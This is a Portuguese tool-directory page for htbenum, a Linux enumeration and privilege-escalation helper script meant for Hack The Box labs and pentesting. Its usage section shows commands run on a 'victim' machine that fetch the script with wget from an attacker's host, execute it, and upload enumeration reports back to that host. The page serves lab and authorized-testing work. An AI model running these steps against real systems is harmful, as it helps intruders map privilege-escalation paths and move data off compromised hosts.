Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
htbenum — Um script de enumeração Linux para Hack The Box | Kitploit
Ferramentas/GitHubGitHub/solomonsklash/htbenum
Escalada de PrivilégiosFrameworks de ExploraçãoScripting e AutomaçãoColeta de InformaçõesTestes de Penetração
GitHubsolomonsklash/htbenum

htbenum

Um script de enumeração Linux para Hack The Box

Ver Repositório
19236há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

htbenum

Um script de enumeração Linux para Hack The Box

GitHub Github language GitHub issues Github contributors

Este script foi projetado para uso em situações onde você não tem acesso à internet em um host Linux e gostaria de executar scripts de enumeração e sugestão de exploração, como no Hack The Box. Costumo executar um conjunto semelhante de scripts quando consigo um ponto de apoio inicial em uma máquina Linux, e este script ajuda a automatizar o processo de baixar a versão mais recente de cada script de enumeração, torná-lo executável e executá-lo, além de enviar a saída para um arquivo para análise posterior. Ele também possui um servidor web embutido para hospedar as ferramentas e enviar relatórios de volta para a máquina host.

Pull requests/sugestões bem-vindos!

Recursos

  • 5 scripts de enumeração diferentes, incluindo:
    • linux-smart-enumeration
    • LinEnum
    • linuxprivchecker.py
    • uptux
    • SUID3NUM
  • 2 ferramentas diferentes de sugestão de exploração, incluindo:
    • linux-soft-exploit-suggester
    • LES: Ferramenta de auditoria de escalonamento de privilégio Linux
  • Servidor web embutido para hospedar ferramentas e enviar relatórios concluídos
  • Recurso automático de download e atualização de ferramentas
  • Opção de diretório personalizado, para quando você sabe que tem acesso a um diretório específico (padrão é /tmp)
  • Menu interativo permite escolher se deseja executar apenas enumeração, apenas sugestão de exploração ou ambos
  • Verifica Python 2 e 3 e informa quais scripts serão ignorados se o Python estiver ausente

Uso

root@kitploit:~
./htbenum.sh [-u] -i IP -p porta [-o diretório] [-w] [-r]

Exemplo:
         Máquina host: root@kali:~/htbenum# ./htbenum.sh -u
         Máquina host: root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
         Máquina vítima: www-data@victim:/tmp$ wget http://10.10.14.1:80/htbenum.sh
         Máquina vítima: www-data@victim:/tmp$ chmod +x ./htbenum.sh
         Máquina vítima: www-data@victim:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r

 Parâmetros:
         -h - Visualizar ajuda e uso.
         -i IP - Endereço IP do servidor web de escuta usado para upload e download.
         -p porta - Porta TCP do servidor web de escuta usado para upload e download.
         -o diretório - Diretório personalizado de download e criação de relatórios (padrão é /tmp).
         -w - Iniciar servidor web embutido para baixar arquivos e enviar relatórios.
         -u - Atualizar para as versões mais recentes de cada ferramenta, sobrescrevendo quaisquer versões existentes.
         -r - Enviar relatórios de volta para o servidor web da máquina host (deve suportar requisições PUT).

Para usar o htbenum, clone o repositório e execute o script com o parâmetro update na sua máquina local. Isso baixará e atualizará todos os scripts necessários da internet (Github) e os colocará no mesmo diretório que htbenum.sh:

root@kitploit:~
root@kali:~# git clone https://github.com/SolomonSklash/htbenum
root@kali:~# cd htbenum
root@kali:~/htbenum#  ./htbenum.sh -u
_   _ ___________ _____ _   _ _   ____  ___
| | | |_   _| ___ \  ___| \ | | | | |  \/  |
| |_| | | | | |_/ / |__ |  \| | | | | .  . |
|  _  | | | | ___ \  __|| . ` | | | | |\/| |
| | | | | | | |_/ / |___| |\  | |_| | |  | |
\_| |_/ \_/ \____/\____/\_| \_/\___/\_|  |_/

By Solomon Sklash - [email protected] 

[i] Updating all tools...
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh [31859/31859] -> "lse.sh" [1]
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh [46476/46476] -> "linenum.sh" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py [25304/25304] -> "linuxprivchecker.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/initstring/uptux/master/uptux.py [29853/29853] -> "uptux.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py [12614/12614] -> "suid3num.py" [1]
2019-11-25 17:54:57 URL:https://raw.githubusercontent.com/belane/linux-soft-exploit-suggester/master/linux-soft-exploit-suggester.py [13886/13886] -> "les-soft.py" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/offensive-security/exploit-database/master/files_exploits.csv [5669905/5669905] -> "files_exploits.csv" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh [82214/82214] -> "les.sh" [1]
[i] Update complete!
root@kali:~/htbenum#  

Em seguida, inicie o servidor web embutido para hospedar as ferramentas e receber os relatórios concluídos. O servidor requer Python 3. Você pode usar seu próprio servidor web para hospedar as ferramentas, mas ele precisará suportar requisições PUT para os uploads de relatórios.

root@kitploit:~
root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w

Finalmente, faça o upload do script htbenum.sh para a máquina alvo, torne-o executável e execute-o com o IP e porta da sua máquina host, com um diretório opcional para baixar arquivos e escrever a saída dos relatórios. Você também pode opcionalmente enviar os relatórios de volta para a máquina host. Por exemplo:

root@kitploit:~
www-data@htb:/tmp$ wget http://10.10.99.100/htbenum.sh -O /tmp/htbenum.sh
www-data@htb:/tmp$ chmod +x ./htbenum.sh
www-data@htb:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r

Cada ferramenta enviará sua saída para um arquivo de relatório no mesmo diretório do script htbenum.sh, ou qualquer diretório especificado pelo parâmetro -d.

Baixar ferramenta